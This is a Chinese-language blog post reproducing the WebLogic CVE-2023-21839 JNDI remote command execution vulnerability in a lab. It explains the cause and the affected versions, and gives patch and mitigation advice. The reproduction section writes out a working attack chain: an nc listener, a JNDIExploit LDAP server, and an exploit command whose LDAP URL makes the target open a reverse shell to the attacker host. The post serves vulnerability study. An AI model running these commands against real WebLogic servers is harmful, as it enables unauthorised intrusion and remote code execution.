Weblogic 远程命令执行漏洞(CVE-2023-21839)

最新推荐文章于 2024-03-01 14:01:47 发布
最新推荐文章于 2024-03-01 14:01:47 发布
阅读量764 收藏 1
点赞数
分类专栏: web安全 漏洞复现 web服务器漏洞 文章标签: 安全 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myu_wzy/article/details/130406912
版权

文章目录

漏洞描述(介绍、成因)

由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。

漏洞危害

允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致远程命令执行。

适用场景

Oracle WebLogic Server == 10.3.6

Oracle WebLogic Server == 12.1.3

(注:10.3.6及12.1.3 版本目前官方已停止维护)

Oracle WebLogic Server == 12.2.1.3.0

Oracle WebLogic Server == 12.2.1.4.0

Oracle WebLogic Server == 14.1.1.0.0

漏洞复现过程(有条件的自行搭建环境)

1、开启docker环境

在这里插入图片描述

访问页面,http://192.168.10.128:7001/console/login/LoginForm.jsp,成功启动weblogic

在这里插入图片描述

2、监听端口

在攻击机192.168.10.135上面监听端口

nc -lvvp 7777

在这里插入图片描述

3、监听中转文件

在攻击机192.168.10.135上面监听JNDIExploit-1.4-SNAPSHOT.jar

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.10.135

在这里插入图片描述

4、利用exe获取反弹shell

192.168.10.128为靶机ip,192.168.10.135为攻击机ip,7777为接收shell的端口

CVE-2023-21839.exe -ip 192.168.10.128 -port 7001 -ldap ldap://192.168.10.135:1389/Basic/ReverseShell/192.168.10.135/7777

在这里插入图片描述

中转文件成功转发

在这里插入图片描述

成功获得反弹shell

在这里插入图片描述

修复建议

目前Oracle已经发布了相关漏洞的补丁,受影响用户可及时修复。

链接:https://www.oracle.com/security-alerts/cpujan2023.html

缓解方式禁用 T3 及 IIOP

扩展知识(链接、文章)

参考链接:CVE-2023-21839漏洞本地简单复现_乌鸦安全的博客-CSDN博客

注:本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!!!

Myu_ww
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
02-28
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6252
Weblogic CVE-2023-21839漏洞复现
Weblogic常见漏洞详解
最新发布
m0_64481831的博客
03-01 1887
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)漏洞复现
weixin_48413667的博客
09-22 7982
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882和CVE-2020-14883
Weblogic远程代码执行漏洞CVE-2023-21839)复现/保姆级讲解
BGiscool的博客
02-28 4028
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
Weblogic wls9_async_response 反序列化远程命令执行漏洞CVE-2019-2725)复现
ditanji3425的博客
05-06 1487
一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8。 CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”。 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远...
JNDIExploit-1.4-SNAPSHOT.jar
01-10
编译后的JNDIExploit-1.4-SNAPSHOT.jar,可以直接用,1.4版本支持tomcatBypass路由直接上线msf。
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3335
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1466
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现。
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
wangluoanquan111的博客
10-09 451
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CVE-2023-21839:Oracle WebLogic Server RCE
qq_45747465的博客
07-07 515
努力提升自己呀
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
第48篇:Weblogic最新漏洞修复方法(禁用T3+IIOP协议)
热门推荐
ABC_123的博客
01-27 12万+
Part1 前言大家好,我是ABC_123。春节前weblogic爆出了一个新的漏洞CVE-2023-21839,据说有攻击队曾用这个在野0day打穿了某银行目标。通过官方的漏洞描述来看,应该还是借助jndi来实现反序列化漏洞利用,所以此漏洞成功条件是目标一定要出网,而且T3或IIOP协议开放。与T3协议或IIOP协议相关的weblogic的0day漏洞近几年还会不断地公布出来,要想彻底解决这...
weblogic命令行操作
小胡子
06-03 1820
启动和停止子节点: [root@oud bin]# cd /sotware/oracle_ldap/Middleware/user_projects/domains/base_domain/bin/ [root@oud bin]# ./startManagedWebLogic.sh Server-0 http://192.168.63.129:7001 -Dweblogic.management.username=weblogic -Dweblogic.management.password=weblo
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6200
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
CVE-2023-21839
08-17
CVE-2023-21839是一个Weblogic漏洞,可以导致远程代码执行。根据引用提供的信息,可以使用nc工具进行端口监听,用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前,需要先编译为可执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值